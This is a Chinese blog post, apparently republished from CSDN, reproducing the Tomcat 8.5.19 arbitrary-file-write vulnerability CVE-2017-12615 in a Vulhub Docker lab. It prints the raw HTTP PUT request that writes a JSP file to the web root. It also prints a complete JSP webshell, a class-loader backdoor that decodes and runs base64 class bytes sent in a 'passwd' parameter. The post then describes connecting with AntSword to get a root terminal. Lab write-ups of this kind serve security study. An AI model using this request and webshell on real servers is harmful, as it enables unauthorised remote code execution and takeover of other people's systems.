码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Tomcat8 任意写文件PUT方法 (CVE-2017-12615)


    Tomcat 任意写文件PUT方法 (CVE-2017-12615)

    文章目录

      • Tomcat 任意写文件PUT方法 (CVE-2017-12615)
        • 1 在线漏洞解读:
        • 2 版本影响
        • 3 环境搭建
        • 4 漏洞复现
          • 4.1 访问
          • 4.2 POC攻击点
            • 4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
            • 4.2.2 访问是否通,可以访问到文件
        • 5 漏洞利用
          • 5.1 上传jsp一句话
          • 5.2 kali打开蚁剑:
          • 5.3 连接jsp一句话木马,密码为 passwd
          • 5.4 打开终端,获取root

    1 在线漏洞解读:

    https://vulhub.org/#/environments/tomcat/CVE-2017-12615/
    
    • 1

    在这里插入图片描述

    2 版本影响

    ​ Tomcat version: 8.5.19

    3 环境搭建

    cd /home/kali/vulhub/tomcat/CVE-2017-12615
    
    • 1

    在这里插入图片描述

    环境启动:

    sudo docker-compose up -d
    
    sudo docker ps -a
    
    • 1
    • 2
    • 3

    已启动:访问端口8091

    在这里插入图片描述

    4 漏洞复现

    4.1 访问

    ​ 4.1 访问http://192.168.225.166:8091/看到Tomcat示例页面,发现8.5.19版本后台管理是不允许登录的

    在这里插入图片描述
    在这里插入图片描述

    4.2 POC攻击点
    4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
    PUT /1.jsp/ HTTP/1.1
    Host: your-ip:8080
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 5
    
    shell
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    4.2.2 访问是否通,可以访问到文件

    在这里插入图片描述

    5 漏洞利用

    5.1 上传jsp一句话
    <%!
        class U extends ClassLoader {
            U(ClassLoader c) {
                super(c);
            }
            public Class g(byte[] b) {
                return super.defineClass(b, 0, b.length);
            }
        }
     
        public byte[] base64Decode(String str) throws Exception {
            try {
                Class clazz = Class.forName("sun.misc.BASE64Decoder");
                return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
            } catch (Exception e) {
                Class clazz = Class.forName("java.util.Base64");
                Object decoder = clazz.getMethod("getDecoder").invoke(null);
                return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
            }
        }
    %>
    <%
        String cls = request.getParameter("passwd");
        if (cls != null) {
            new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
        }
    %>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    5.2 kali打开蚁剑:
    ┌──(kali💋kali)-[~]
    └─$ sudo antsword 
    
    • 1
    • 2
    5.3 连接jsp一句话木马,密码为 passwd

    在这里插入图片描述

    5.4 打开终端,获取root

    在这里插入图片描述

  • 相关阅读:
    Java多线程(Thread)详解之启动与中断
    吃透这 500 道大厂 Java 高频面试题后,怒斩 offer
    [附源码]计算机毕业设计农产品销售网站Springboot程序
    在IDEA里面操作Git
    “Git 在团队协作中的优化实践“
    spark入门学习-1
    Leetcode 704 二分查找
    【git命令】删除分支
    关于JS进行大文件分片上传碰到的问题
    [思维]Shortest Path in GCD Graph 2022杭电多校第9场 1008
  • 原文地址:https://blog.csdn.net/weixin_42786460/article/details/133269429
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号